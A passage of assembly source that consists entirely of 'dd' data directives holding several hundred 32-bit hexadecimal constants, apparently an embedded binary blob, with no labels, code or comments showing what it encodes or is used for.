dd 0A0B8C9B0h, 0C22EF765h, 0FBC02033h, 5371026Ah, 0EC312890h
dd 0C2239632h, 4A29BC35h, 8AED2532h, 20884841h, 1D961664h
dd 0A5C45713h, 39A76F44h, 4A812F29h, 26270974h, 45A9EB24h
dd 5FECB425h, 4B805B5Ah, 900C41F6h, 83060B32h, 4F00879h
dd 449FF00h, 118B0B78h, 13027988h, 0EB60F01h, 0BEAE0C4Ah
dd 7ADF49B2h, 0D1D38744h, 7C06DAB0h, 0C92BE7C3h, 0BAC23A05h
dd 8A0C6913h, 0BEFF9694h, 23B7E812h, 91D63EB6h, 7FE07D7Dh
dd 2981E75Eh, 0AE9B47F6h, 0D9924D53h, 7F8320C0h, 2E75BAC5h
dd 12040EBh, 8A2DEB06h, 4CFF031Bh, 0E8CFF014h, 436BCC82h
dd 137B756Dh, 81D4E231h, 886C2A38h, 3FB0CF0Fh, 0C4E69CAh
dd 0D395247Ch, 0F87CABBDh, 0FE082136h, 78027808h, 8B8101F4h
dd 772786DBh, 0D49D4B53h, 57FEE03Eh, 0C61BDF4h, 8B5FF15h
dd 4D8D0D85h, 48DDFC9Ch, 12D43B6Fh, 74ECB475h, 0E0DCE097h
dd 10C406C8h, 0E8BC09B0h, 392561A8h, 2DF5F531h, 0FBA565E9h
dd 0D56ABF71h, 0E4E3510Bh, 7D801C89h, 58D225A8h, 5E48A442h
dd 0E508CF86h, 4086A4D4h, 85350FDAh, 1B0B57A4h, 405CE464h
dd 0C6A136FFh, 5256F9D0h, 2804FE0Eh, 112C4822h, 5F804C1h
dd 8885348Dh, 366AE8C6h, 3C1DD41h, 0C32C5906h, 24C6D752h
dd 7555A27Fh, 113702F5h, 346539Eh, 2A3AF5C4h, 0A2C6E33Ah
dd 44220480h, 98C3DE3Bh, 8A11071Ah, 95C93313h, 0CCF90CD2h
dd 0AC80D806h, 0E7553188h, 0A707EE30h, 5F7A587Ah, 0B83583CCh
dd 80E08CF1h, 2CC28A1Dh, 24583C20h, 3CF91177h, 800601CCh
dd 0BB40D8A0h, 4AD9AF9h, 1DB56308h, 71C1842Ah, 40076A27h
dd 3B590481h, 8C5E20F9h, 7A870F1Ah, 7E03D56Dh, 571E7439h
dd 0B6B2E04Dh, 48604688h, 0E8C869C0h, 4558E98Dh, 6683A19Fh
dd 0A3E19BCh, 32DD503h, 481FD108h, 403DE3C6h, 0DB39A51Dh
dd 2614743Fh, 8F0930E9h, 0C7272804h, 481E9401h, 4F572681h
dd 4715128Ah, 44099402h, 2BC4FA80h, 0E8C7CB82h, 0D8BD4FCh
dd 0FE3BFC7Fh, 8D9D0010h, 40A406F0h, 9A5DF73Eh, 8F19E4E9h
dd 170C12ABh, 13CAF40Ah, 1A08448Dh, 0C08D1A07h, 0E103252Bh
dd 4291E2C7h, 0E0201B1Dh, 0C540AE43h, 3FA555E9h, 6EC834E6h
dd 74496190h, 680A9D46h
dd 6C3D3850h, 77501520h, 65378C1h, 84470A6h, 3B24A16Ch
dd 43C861DAh, 0E16D1247h, 57E95A41h, 0CAFB9959h, 2009914Eh
dd 0C11445E5h, 70363C07h, 7B1D80C5h, 118A3401h, 46BE2F43h
dd 3C2A2822h, 32431B33h, 7F49C34Bh, 101B3A97h, 564890Dh
dd 80805B9h, 62FD1E69h, 84F56F40h, 84ED7540h, 84E57840h
dd 8ADD5840h, 0C28CF205h, 0C1579C10h, 64D2C246h, 3A6F25F7h
dd 0B826A6D1h, 540BE713h, 0D0C10219h, 0E812608Dh, 208B96F9h
dd 84431B8Fh, 6A22C9C0h, 441986C1h, 9824E9E0h, 0F8C6C005h
dd 728F2DF2h, 0EB842468h, 531E208Bh, 7480AB70h, 75C7905Ah
dd 0D0104941h, 8094032h, 0F12C120Ah, 0C206062Ah, 8845C720h
dd 6B35E153h, 0C040F512h, 168DE06Ch, 26B8EC5Dh, 0DC48CEB1h
dd 70982451h, 113FC71Bh, 4F06E04Ah, 7D666C88h, 30E80EF7h
dd 71327508h, 4C6CEB4Eh, 818E0711h, 2828E096h, 0B905257Fh
dd 0BDAA5AFAh, 8101F02h, 0CCAC34Ch, 0B30899DCh, 0B4CC2803h
dd 7CC08B3h, 0D8F0D0A5h, 1BCC006h, 378D6884h, 68142AA9h
dd 86A9D339h, 18C12B5Dh, 0B1936468h, 873B9D46h, 27740050h
dd 0FC47B70Fh, 0AD685029h, 0EC793D28h, 62D808CBh, 4F4EE411h
dd 90F6F510h, 0EB83B0AAh, 4C348A0Dh, 24AF4088h, 0E92A586Ah
dd 9BC650E9h, 289F078Bh, 0B04BC63Bh, 144866F8h, 5D82A4CEh
dd 0BF0FC502h, 0DC1FDF7Eh, 2B991180h, 0A5F8D1C2h, 4C1B119Ch
dd 11138C2Ah, 0BBC856A1h, 0DF5FE062h, 95E12E5Fh, 706C5083h
dd 7B238681h, 65967421h, 18EAAE0Ah, 8E49679Eh, 0BC4CD4A0h
dd 82746992h, 57C36EA1h, 190F0A48h, 0F639CE85h, 9880DC95h
dd 74240822h, 294C4049h, 8B4013EBh, 0F2F46737h, 0C65536D8h
dd 0AA03F490h, 99B602Bh, 742D9066h, 1B62BCCCh, 0E471105h
dd 88E909E2h, 40B39903h, 4A0A9791h, 8566EAC0h, 890F1AC9h
dd 0E40F3B43h, 9E0457C6h, 6B62B998h, 0C10E751Bh, 47D5670Ch
dd 194CCE25h, 1239623Eh, 36C9037Eh, 3B586181h, 0DE25F25Fh
dd 0C6183141h, 563B975Dh, 7C22150Ah, 170C8A13h, 2AAC4259h
dd 80ED0A74h, 258B98FDh, 0E6FCEBD8h, 6CB02D22h, 8673FA4h
dd 0C898030h, 99840C5Fh, 4DF628BFh, 0C658488h, 1BBD59E0h
dd 80288C98h, 49351053h, 2D742DE8h, 7110F1E2h, 3EFD7D8Bh
dd 52E742E4h, 1A26F380h, 1528B96Fh, 4C53643Ah, 33BC22F4h
dd 7D80419Fh, 19AA42E7h, 1F392762h, 859D08F0h, 752D3B82h
dd 4031440Bh, 0AA9A4301h, 72E95312h, 229B6251h, 0B4BCA008h
dd 47214CEBh, 70267320h, 0D6F3BFDh, 0C8633BE3h, 62CD5926h
dd 7C2A27B4h, 425910E4h, 0E8A13C9h, 0C6510430h, 0C730C8A4h
dd 0C408F82Dh, 0B1E98D02h, 0C1142031h, 76CA25B8h, 982844B2h
dd 8790F67Dh, 400A1564h, 980636C8h, 0EBFC8029h, 1D879904h
dd 2B10DA99h, 3740BA3h, 3302160Dh, 21BE3FD2h, 0D63B1881h
dd 347C147Fh, 0E077365h, 0D283D8F7h, 0B5DAAA0Eh, 906918E9h
dd 0F8C8FF8Bh, 0DB5CC975h, 0A4B9BE7Eh, 11519809h, 0F74DE1FEh
dd 0A1528463h, 0BC78B80h, 21F275C3h, 0B58D95A0h, 0F6B1D7B0h
dd 6614FF96h, 67F149Eh, 24741819h, 4899D820h, 57052552h
dd 0B93681E8h, 80302CB0h, 140D3912h, 0BEB7B698h, 0D00197Ch
dd 0EB4E0E88h, 858DCC14h, 0C62B0A3Ah, 29A7A46h, 906150AAh
dd 0B84C5AE3h, 80CE8126h, 41ED3039h, 318BA6A6h, 0EC01C606h
dd 3219EB40h, 6256649h, 4AED5E7h, 842BF4BDh, 0EB06C1FBh
dd 21B3631Fh, 90169C8h, 6E388049h, 2308B7C4h, 9A3B4F5h
dd 4B03B0C6h, 2285FB85h, 0E2D0E8A1h, 0F0662525h, 538CD57Ah
dd 12EB2D05h, 2B0A23A8h, 2D308D3h, 20240BD2h, 8B2798EAh
dd 2BC05D1Ch, 0EC06D8DBh, 750C9190h, 283A9C11h, 53CC0FF2h
dd 3BA5206Ah, 6E65B2F7h, 35109322h, 4D087314h, 0B24BE8C8h
dd 287E0851h, 75040F30h, 5457660Fh, 0EF63930h, 83812DA4h
dd 0D8FB85BCh, 0D8045174h, 0CEC54D7Eh, 51B7C28Ch, 50D8DA06h
dd 220ED6Ah, 27C88AECh, 0C8FD4690h, 345DF1E8h, 1F75C329h
dd 8B244839h, 64B4CE6Eh, 0E824A074h, 9DF663E4h, 5980987Dh
dd 0EB2CC175h, 0CC175A13h, 1B5201B1h, 0C9698650h, 4A594E37h
dd 64827C8Fh, 11202274h, 0AC39FE8Ch, 9C451B2Ah, 0CC7EE8B0h
dd 1C6523CCh, 0B8E2A059h, 0D9E29D8Ah, 24E75741h, 8C504DABh
dd 0D0FED4CEh, 0C029E925h, 6990E893h, 0D1C60ACBh, 0E9E9B09Fh
dd 73C8AA24h, 0E9AF49D4h, 474A8D4Bh, 0CD00C057h, 14E8315Bh
dd 2FC58165h, 0C3C93840h, 0E1406E07h, 8916CCDh, 20D82289h
dd 1A446D12h, 0BC498951h, 6B84A39h, 4A7B572Dh, 0B8A16316h
dd 6B478D6Bh, 87034084h, 7B52E818h, 0D5F84823h, 0F174C4Ch
dd 0F0E7A582h, 0DE172BDFh, 2B0E6B8Dh, 787265FDh, 0FACDFE82h
dd 0E65095C5h, 4A735909h, 0D7D54BB8h, 8B0221CFh, 0C7CB03C6h
dd 50107241h, 0F10A886Fh, 85CC1E4Eh, 8D170C75h, 432F1046h
dd 7CDA478Ch, 0FBC13309h, 3C310002h, 4472E898h, 85A4A3EDh
dd 637843F1h, 29891F25h, 22FB7679h, 0B594861Ah, 0FBD54F43h
dd 49BE4975h, 0A20459h, 98D71E47h, 0B7ED3117h, 54F60F19h
dd 75304145h, 6E186A05h, 268303C1h, 4B03E23Eh, 10A08FC2h
dd 0A983E707h, 5DA5CD3Ch, 247DCE62h, 0E857FBC2h, 0CF23BC69h
dd 1BCDC353h, 4CC6E55h, 9F608ABBh, 8C6C01Bh, 0CFA4859h
dd 0E480B857h, 5A0BF9Ch, 81A2C73Bh, 20FC95D7h, 882481A4h
dd 9F3DD609h, 0B78DC533h, 0C5F7ACD0h, 3DCDEC6Dh, 8328DACFh
dd 0FE720690h, 0E04D9D3Fh, 39816680h, 0B7745A4Dh, 41C7E3AFh
dd 0E4C1773Ch, 0A520FB38h, 0C0C933F0h, 0B187832h, 944F0F01h
dd 0B32A91B5h, 48999F90h, 0DA30C84Ch, 53141841h, 6710C56h
dd 1EA170B8h, 9036857h, 0DC1E7618h, 0C3CB092h, 723DF93Bh
dd 8589209h, 0FB2F77B8h, 0C2277E78h, 2CAEDE01h, 0E6273D8Bh
dd 0FD5A5E71h, 407DA012h, 8FE5C031h, 0F42C622Dh, 14F8592Bh
dd 93288BFAh, 3CC4B2BCh, 70AC16FFh, 84594D8h, 50142D50h
dd 52431AA4h, 3B3F0822h, 0C124828Bh, 42F71FE8h, 5DE3C220h
dd 5069C0C7h, 0E1E69D45h, 3DCD0150h, 0C014CD9Eh, 72C23FF4h
dd 20B7479Fh, 493285BBh, 0E0423BD0h, 0D4410D3Eh, 0ABDFED9Ch
dd 16DD7859h, 0D02E0133h, 0F97B27A3h, 32A3046Fh, 0C359264Ch
dd 773B6819h, 443AD76Fh, 0BCD4A35Fh, 6CC32F10h, 0E0E83BD9h
dd 0FA3CC4Eh, 20468425h, 0A15C5669h, 3849D7Ch, 0E0BB957h
dd 273953CAh, 0D8A10E74h, 5120DB6Bh, 703E6C1h, 72CB3BDAh
dd 12C0C6EEh, 0C819C279h, 75360873h, 99C19520h, 0A9CA27C3h
dd 0A1FA7AABh, 0FB38FC43h, 5EA8340h, 606C8EF9h, 15921508h
dd 5E11EAE9h, 56DE4D82h, 0BA6044E7h, 0CDD005Ch, 89BE12B4h
dd 35822FF8h, 0D862FB8h, 3DECF370h, 0D1067450h, 3BF90300h
dd 6B247DD7h, 30C7BC9h, 64835C7Eh, 33440839h, 15841D1Fh
dd 91DF0342h, 7CD33B05h, 7087B9E2h, 3E8E3D24h, 756450B0h
dd 46C73A09h, 0EB9783B0h, 90683D5Eh, 81901027h, 913D4E82h
dd 8844214h, 51933D3Eh, 212E0885h, 82448D3Dh, 8F3D1E20h
dd 82861085h, 11923D0Eh, 238A1207h, 0BEBC76FFh, 8DD39609h
dd 7344E8DAh, 4B51E523h, 2021C61Ah, 995467Ch, 0AD0B7C92h
dd 6298A9E6h, 0DCEA4170h, 8E005A1h, 19288AE4h, 0F7C11EBh
dd 56503956h, 0F109B2E8h, 5309F66Bh, 0E2BDE8F8h, 0EB56C965h
dd 4CE6F357h, 145E7C1Ch
dd 210573C1h, 46F6155h, 441BE0ECh, 1DF9E990h, 6C482958h
dd 0A20E622h, 59E9B7E3h, 0D80692E4h, 0FB05F3A9h, 0BB4C7F0Bh
dd 0F408BC6h, 0C12B5902h, 809222Ch, 75016489h, 0EA187044h
dd 5334FCB9h, 0E25E2CBCh, 1611071h, 149FBE29h, 0EB0005A1h
dd 5C77FF60h, 0E877D38Bh, 62AF929Fh, 6FB81D2h, 94BC5AEBh
dd 740FE886h, 0D4F90A3Ch, 1CF0482Bh, 0C54AD5F8h, 2FE8BB78h
dd 61C6D4BFh, 9FBEAE29h, 7C05A114h, 0F0A4167Ch, 0C70547F9h
dd 4FF2CA0Ah, 0B15E0594h, 67E5B8FAh, 542BCC68h, 8859469Bh
dd 113039Ch, 0C5D222ACh, 0B05B17F5h, 0CA6CB406h, 9FE41838h
dd 0D6FAACA2h, 5494482Dh, 826D8FCh, 0EADD225Fh, 0BB0AD205h
dd 4F8B8E04h, 9BD43ED3h, 0FC31B647h, 641CC840h, 0DDC7D00Fh
dd 62368C93h, 462E4D24h, 91DC2A99h, 507F7412h, 32030F15h
dd 7D2239CAh, 32EB58F8h, 5C570251h, 42114489h, 14D258BFh
dd 8F34E8DBh, 2F14068Bh, 24461553h, 640F0F1Fh, 0A655EA53h
dd 5568EB1Ah, 2F37588Ah, 9ED60DD2h, 428AF5B0h, 1E1C45D5h
dd 112699h, 6469621h, 64D04016h, 0ACE8BEA0h, 31E989B7h
dd 0FB22EC0Ah, 0AF8959Eh, 0D64BFCC8h, 0D17861A9h, 4A296240h
dd 6A0461E8h, 88206814h, 0E1472CDEh, 84FCFC50h, 94E79422h
dd 75F702A1h, 0A8F68D53h, 0C7110C24h, 2874EA7Eh, 0FE01570Dh
dd 0B6D24A38h, 6F675169h, 0D9441681h, 453E766Ah, 1C7F127Fh
dd 220D45BFh, 0BE050D42h, 7A167B0Ch, 43E66783h, 0D06E8789h
dd 0DD04E8D6h, 9D45D692h, 99C92FEBh, 0F92958A7h, 0D4930BFFh
dd 8DC012F4h, 815A6490h, 10DC7D28h, 566A54CEh, 7A58EAB3h
dd 0B25AE038h, 0E8CF9E7Bh, 4B7DDEB9h, 561873B6h, 4D8DA357h
dd 0D428E8F6h, 10731CCCh, 44D2C4D0h, 892A0291h, 2C148530h
dd 7FFD84E8h, 0ECB5BEA6h, 0C47056A1h, 0F87D8009h, 0F4420DE4h
dd 0D6104E59h, 7D390401h, 0A187414h, 0C9627C02h, 8C7F240Dh
dd 2A53AE8Ah, 3B71E8Ah, 83017E8Dh, 7F77ACB9h, 229517F2h
dd 50B60F14h, 0B81FA124h, 48CD5A6Eh, 0F0B2A6FEh, 0B65DDE91h
dd 4090633h, 48E08342h, 18A059Eh, 0C7EB471Fh, 202DFB80h
dd 4D1E83ADh, 5D90218h, 3ED2B16h, 0B8EE2BB5h, 8C0F0BC2h
dd 92D0E449h, 940549Fh, 458FF224h, 75348C37h, 5B30522Ah
dd 14B80474h, 8A34200Ah, 783C2407h, 582A3A83h, 32084213h
dd 11101321h, 1B6EBC0Ah, 0AA5F1375h, 426A40Eh, 4728FA1Fh
dd 8FB15263h, 3312854Dh, 14060AD2h, 0C1CB1C94h, 0F64E0CB7h
dd 8EA60C1h, 83F8BEF8h, 0EB30E90Bh, 380C11Ah, 7E31C720h
dd 0A880588Ah, 19F93173h, 9703772Fh, 0F3002032h, 144D3BC9h
dd 0B2195473h, 1827B008h, 0A02772FCh, 7637CA3Bh, 0DE8B1F21h
dd 1E2345C7h, 0A84F87BDh, 4208508h, 0EB03740Eh, 1691C512h
dd 24285CEBh, 4AF0F1Dh, 0A1D90314h, 8CF808A0h, 0BE04A812h
dd 4D31ABB5h, 3ED101E5h, 0A2021120h, 48D689BEh, 0F37780DFh
dd 392CE351h, 2776E8CFh, 0C1E62DE8h, 11879A2h, 7464B07Eh
dd 23822894h, 2597CEBh, 0F6022418h, 30B3A79h, 0D79E2AC6h
dd 4D072FA7h, 908D5738h, 5BC4F703h, 0FC0E61BFh, 245818EBh
dd 0EBDA9330h, 2B4B2892h, 5391416h, 95FB9F9h, 86B21041h
dd 90680EC0h, 4F410E5Dh, 0B11335A8h, 0BB1535FDh, 0D5AA9325h
dd 1A85AAE4h, 0EF5656EBh, 5755EF4Bh, 6822878Eh, 145D7EC8h
dd 0C5D1B7F8h, 17C20865h, 0AB15D25h, 629B2C30h, 0C1332C5Dh
dd 112070CBh, 6774E2FEh, 9634893Bh, 3EA012FAh, 2E3D76F2h
dd 5CE6F48Dh, 0BA8B361h, 3C894889h, 4602047Bh, 105F68CCh
dd 260843A5h, 9A447EE8h, 0D1118B9h, 0B0EB1090h, 58F2864h
dd 18918157h, 0AF61563Dh, 0CD41F704h, 69A76F06h, 0E133741Bh
dd 0F848DA39h, 5DE8C80Ah, 0DC20B8C0h, 0DA186827h, 0D747E788h
dd 3EE81461h, 5D43326Bh, 8BC724A8h, 125F0289h, 4C02A621h
dd 0FF290C23h, 18061C71h, 86712881h, 166F290Dh, 53CF8121h
dd 6E876A8Bh, 2DC4DB24h, 52CC5CAFh, 833553D1h, 0F192EA38h
dd 0EFD68FC2h, 222DDB08h, 41C96C1Eh, 4E92E63Ch, 44D525AAh
dd 7F6F204Dh, 41DED09Fh, 5DAB1246h, 2D5DE657h, 0B3905152h
dd 61A6FEB4h, 2D2AB290h, 743F84A4h, 0D80C5E22h, 0B00D0A17h
dd 23485A65h, 1AFFB894h, 122ABB9Ah, 8408F806h, 0DA8A117Ch
dd 20BD4860h, 0E058F0CFh, 1C505E8Dh, 0E55E89Fh, 5D853EEAh
dd 0A623CDAFh, 100D9178h, 267B02ABh, 2B1DC9C3h, 18008AC6h
dd 4D430B88h, 8DF70C75h, 0BE731D8Eh, 8A0B8FE1h, 11884114h
dd 28A24E41h, 4A989FCDh, 2184FB64h, 98E6051Ch, 0C2535AE3h
dd 76048435h, 8A8023A0h, 44BF4741h, 0EF97C23Fh, 881E8659h
dd 0BF98050Ah, 54044097h, 99C7F472h, 0C6C0C22Fh, 20108085h
dd 908D2B74h, 6F599866h, 3BCE06C8h, 0E01677A7h, 8D5040C1h
dd 1B0D9428h, 52206A02h, 99BF5EE8h, 203B43FEh, 6AD8755Bh
dd 0E63ECE9Ch, 68CB98CCh, 0BC41DC50h, 18AFE25Fh, 0DBC9323Eh
dd 2D31D953h, 0BB570202h, 8065D61Fh, 993023F8h, 21441409h
dd 5ED201C8h, 8E2548A2h, 27112FFEh, 0B7A6E024h, 13C8D34Ch
dd 0ED707E6h, 1D069280h, 58C48C0h, 11EB54A0h, 74C826DDh
dd 26204415h, 0F988778Dh, 0EB052822h, 5084C608h, 0C1CFDF09h
dd 868D4DE2h, 0F760E8Bh, 1BD19F16h, 128F29C9h, 8D82558Bh
dd 16830E84h, 5ACAD003h, 19FBF6C0h, 940C7733h, 0D1BB270Eh
dd 0FEBE760h, 22DFE498h, 0EA443EA1h, 102C88EAh, 5830B3EBh
dd 9CF3B41h, 8D8BC572h, 2A5F5E11h, 0BDB46044h, 25FC9C23h
dd 444058E0h, 0DA44AFE6h, 8BE3403Eh, 79A1F82Fh, 70470097h
dd 7F831D74h, 0FCBD6C4Fh, 0F2687717h, 0E82004CFh, 8637C065h
dd 74CF5BC7h, 0CF47050Dh, 46D857FDh, 0E4177589h, 0DCBC353Bh
dd 0D05C368Dh, 9CBF561Ah, 4FE4662h, 0BE50E856h, 225A14Ah
dd 8B684789h, 976F2EADh, 6EAC6057h, 1005E8B1h, 0D88B8EEBh
dd 0CE0EC330h, 0BEB963D7h, 0E45E9AD5h, 0C64179BEh, 7089D534h
dd 0FAC8BD1Dh, 60DEC71Eh, 0E6A1FC25h, 0C9BD8F88h, 0EB1C4528h
dd 0A5523C6Eh, 23381275h, 0DBEB8884h, 2DFC2EC8h, 7A42F3EAh
dd 0EB2F1D14h, 0E8C079C4h, 497B27E7h, 0A0292093h, 9AC1A104h
dd 0D07E0C5Dh, 68E85780h, 0F897FD96h, 899845BAh, 0EBDC37Dh
dd 0D3E8C3D8h, 0C046FC5Eh, 8A9793E9h, 0B8E2C8D5h, 77E0AAB0h
dd 0FF5E6946h, 18C0BDA0h, 17F03D30h, 8150E772h, 0D299FDE4h
dd 2155661Bh, 5A91E918h, 0C7273048h, 538CB304h, 0D24810B4h
dd 33A41425h, 5308572Ch, 0B1292622h, 438D84ABh, 0C1C1AE1Ch
dd 0E389BC88h, 0D9A342D2h, 0FBEC5539h, 23736F4Fh, 0CF8860Fh
dd 0EE7D80C7h, 15C0CFA7h, 8AEF758Dh, 0C8C9F40Eh, 1CA6C21Ah
dd 8FF460Dh, 0E1A6E9F4h, 4122474Fh, 0B1C6397h, 30C96B8Fh
dd 8D129658h, 9860C0B1h, 5B8A2AEBh, 2888F446h, 0D23E6ACBh
dd 0E031A885h, 0AC80308Ah, 3B44083Bh, 19D1D63h, 76F8B847h
dd 3D37BEEAh, 0E472B57Bh, 40B4D149h, 4CB6E0E9h, 4E88627h
dd 0E9720A83h, 0BA98C78Bh, 0DB08431Ah, 0AE426342h, 66A6340h
dd 0CE1F58B7h, 0D87D10F0h, 665A91B4h, 74318B3Bh, 40F430F6h
dd 753E4AE2h, 519D72F3h, 0B7E9091Fh, 0C40107A9h, 60041D03h
dd 7633C107h, 0FC7EB9F6h, 342473E8h, 1E72B071h, 0E1A4FEB9h
dd 40070871h, 8BF97549h, 2EE804F1h, 0AFA765B5h, 0EB14D612h
dd 8DBA7501h, 127D7B42h
dd 263539B2h, 626970D8h, 0FC7A629Dh, 5DC625CAh, 92BAB720h
dd 681410F7h, 0D7B88660h, 698FB53Dh, 8C97432Eh, 0EAF4DC2Fh
dd 5F15FC62h, 77E64A68h, 0BB4A3CC3h, 0D06ADBE8h, 1570842h
dd 2220680Bh, 5753E8C1h, 2B7D3B6Ah, 2540E69Eh, 30A688B9h
dd 0FB056277h, 2383A5F3h, 95ADC0C4h, 71FDC411h, 2EE076C9h
dd 20FC6AB7h, 85DC750Bh, 148B681Dh, 468B110Fh, 16323DABh
dd 0BB3A8183h, 5E895B09h, 3D5D8568h, 0D7F50889h, 270F441h
dd 7AEA6E91h, 8C8C0558h, 8ADD1A01h, 0CBD61068h, 934871B1h
dd 0E010A30Ah, 0C20810B3h, 0E10C1914h, 40B51518h, 5F8CB40h
dd 5B10487Dh, 0A434C1Bh, 4FB0CF3h, 0EB402F0Ah, 3D921AE8h
dd 0D7DF720h, 584C678Ah, 0AA01288h, 67E91984h, 0A4234B08h
dd 13621D18h, 100BA838h, 0A4B1FFE6h, 1365B7A1h, 0B90BBC8Dh
dd 8ABA8110h, 0F620141Dh, 0A2C0D758h, 51301102h, 13CA51ADh
dd 0FC25DAC3h, 812085B0h, 533620FBh, 0EC844BE8h, 74B95F7Ah
dd 0D448BB5Bh, 0E817BAE0h, 0FA02C570h, 3BB8F404h, 601E813h
dd 56E8FD6Ah, 0A15958A3h, 903BB811h, 8E574AAAh, 0A885DAEh
dd 310BC86h, 57C53BEDh, 483D6FF0h, 68B51266h, 0BDB04528h
dd 395E0324h, 235A7528h, 1711B81Ch, 0D54BF05Bh, 0B694E1DCh
dd 25BB4C36h, 42D1542Eh, 219EB486h, 7210EFDh, 11B01AB2h
dd 34184A9Ch, 39081791h, 4C44C4C0h, 88C41C40h, 0EABEFE2Dh
dd 0C8437046h, 0BF88CC22h, 0C72B8C80h, 53865D26h, 4F2A0ED0h
dd 22C0424Dh, 8EFA9D44h, 1DD4BE30h, 9C3D078Bh, 8C54381Eh
dd 3196A4A8h, 0F2560F75h, 3737742Bh, 74AA1DEEh, 7E00D976h
dd 7F815B50h, 0DA833F8h, 5E64114Dh, 85550BFFh, 7BB8FC11h
dd 4CB96F5Ch, 447149Fh, 12E5A217h, 4BE50755h, 0EA56C9D3h
dd 640D89D8h, 4D40AE79h, 249F6B57h, 27362BB6h, 6BD6AD8Bh
dd 34B81B32h, 219EB446h, 5E9D8EC8h, 7B815DC4h, 38B0960h
dd 831918A6h, 0A1EFC7Bh, 10189B35h, 4D100CC3h, 0D476D875h
dd 4D460589h, 0B7868629h, 0A83A0ED3h, 8A898F7Fh, 4FD1E6Ch
dd 9A52BB89h, 3732D3E8h, 948B334Dh, 0ECC1A3C2h, 0F6F12F57h
dd 318F56Bh, 1BE9599Eh, 0DE333A56h, 68C9873Eh, 8C0DB0C6h
dd 0B0FD7822h, 1276D2DAh, 803FD290h, 8BD37010h, 0F024DB9Ah
dd 22014662h, 1C117E83h, 178FC6E8h, 4430E7FEh, 218CB921h
dd 0C1ED383h, 0E0C80308h, 8B6C468Dh, 9554C497h, 949A7644h
dd 0C166519Bh, 8AC7E057h, 975165E2h, 55531889h, 4D8DC5A3h
dd 0BF67C018h, 0B4085DC3h, 0DE3B4068h, 0AFF95473h, 1421B928h
dd 0DCE2C907h, 219A7660h, 0FA3412BDh, 460D781Eh, 58041381h
dd 0FC17AAB1h, 8CCC22ACh, 0A7E91812h, 0BCF440C8h, 27F044B5h
dd 0A0E9C371h, 0E5EE376Bh, 315421B8h, 0C1D88E89h, 5B287D7Dh
dd 0F3C16E95h, 716AA0EDh, 858A1215h, 88026A28h, 5DC7BD1Ch
dd 0BBC6FDh, 15EB5919h, 0B58C2CE8h, 462A44EEh, 402EC933h
dd 41E0FDFCh, 199A5D0h, 8D0470FFh, 3E0F855h, 0C9515052h
dd 0D147E9FCh, 456EB1FAh, 44A226BAh, 6FF54B4Ah, 1410E54h
dd 9F430675h, 0BEBB945h, 0F94D0C89h, 658A7803h, 72C1A5DFh
dd 61044DA7h, 4E14A816h, 8D09F3CFh, 678BFF42h, 64E433F6h
dd 9430FA12h, 2FD88B53h, 8A2FE0C1h, 3C2F743h, 15743504h
dd 38FC0A8Ah, 47CB3A1Eh, 0D5C984CFh, 75152351h, 96D8CA26h
dd 0E3C1C301h, 12BC5610h, 0F9BF0A17h, 0E4FD7F68h, 0CB4B33F7h
dd 0F905E2F8h, 0FEFFF183h, 0CCCF734Fh, 2F0472C6h, 76F2E181h
dd 251C7514h, 0D3741007h, 83DA990h, 808DE633h, 5F5EC4C0h
dd 0ECD15B4Fh, 0C27FFC42h, 4870360Ah, 0E378EF78h, 9AE0275Fh
dd 0CDF895E7h, 911527C8h, 1A0622DCh, 5C96EBD4h, 0FEABB433h
dd 1107AAD7h, 49FC88FDh, 123841D1h, 62BF3881h, 80DD780Bh
dd 408B247Bh, 203D0614h, 90199305h, 7A121EEh, 922F90Eh
dd 40C04961h, 327A9599h, 0ABEBC527h, 6851C08Fh, 0BD56D33Eh
dd 4F8F91CDh, 5139B2D2h, 90493163h, 358B00FAh, 5F1BD2A4h
dd 0D7BEC99Dh, 5AB73578h, 8772A50h, 192E599Bh, 2209243Eh
dd 0B20D0975h, 0C492E14h, 8204E2F9h, 7F2AA49Ah, 46017D98h
dd 0D367EBE2h, 648D0757h, 0F5755C89h, 5D49FED6h, 1B1DC5A5h
dd 0BD21CC5Ch, 60149C32h, 1DFCE6D7h, 856A1827h, 3C86237Fh
dd 477C2C3Dh, 0C3090847h, 0F98DD8ADh, 40E82A8h, 46AEA75h
dd 27D4BC47h, 44927407h, 3D8902FBh, 0FAE95DF0h, 554148CBh
dd 0C640EB2Eh, 0B0A1C29Bh, 643E8045h, 0C32FFE3Dh, 0ADB553Bh
dd 0C33B5D1Bh, 4A74C059h, 9C41FF56h, 0CA6AC246h, 1532896h
dd 0C115E813h, 0C70023A3h, 38F50304h, 0BC7E751Eh, 0C9E84DA8h
dd 2860B359h, 1FEC0B1Dh, 0AC05C712h, 592D5ECAh, 829DAA52h
dd 2513F07Ah, 0B2550A4h, 5AEBB844h, 353B97E4h, 0C085B04Dh
dd 0A7E1395Fh, 0F2A7E4BFh, 0C72845F8h, 78B23901h, 2C8C8C9Dh
dd 13892D04h, 289F2388h, 26105134h, 0D7E6B3E9h, 2746E606h
dd 0FF3CEB09h, 128D7E07h, 1823AB08h, 4B6E7889h, 0BC9AC51Eh
dd 2958129Fh, 4B134C63h, 64AEA53Eh, 38CF4DB1h, 6945AF06h
dd 845E0388h, 0E3C162DBh, 20F53274h, 80A975D2h, 80D0B7FBh
dd 4C090ACFh, 4C04959Fh, 0B9702BC6h, 0F0DA3434h, 0DD8AE9E9h
dd 3EDE07ECh, 0F30E9724h, 19E36A4Eh, 7C65D091h, 45A12208h
dd 48FF1030h, 4324A301h, 2EB03D2h, 460A4146h, 0AEF9745Ch
dd 0A4F12645h, 67421FD5h, 8D23F574h, 26483880h, 27F02E6Eh
dd 28664A25h, 0C4A2C5C7h, 50E9D127h, 49122AEDh, 5C02157Dh
dd 297FD142h, 2ACCF175h, 0A67477FEh, 830854A4h, 47F2834Bh
dd 3D14417Fh, 0BE0F5289h, 0E8F42F89h, 0E528730Ah, 8A540DC6h
dd 43DD33DFh, 0D09AEA7Ch, 2319F062h, 3733B603h, 95E9F0AAh
dd 0D9DF54DAh, 3222E1E0h, 27103140h, 71640EE9h, 0A6CD8A97h
dd 20835831h, 72EBFCC3h, 796F0C7Bh, 2DF7B908h, 40888A71h
dd 8853831Ch, 8B97441Dh, 0A1C4885Eh, 3520EEC9h, 4A357089h
dd 38CE4514h, 75DC4718h, 777DFE03h, 0FBD689EEh, 5C3B36A4h
dd 0EE80A57h, 4D3F6AFEh, 0E93D304Dh, 0C94A733Fh, 0F15CF4FEh
dd 9D42263Ch, 2E7C100h, 950F048Dh, 364C1250h, 0DE493C71h
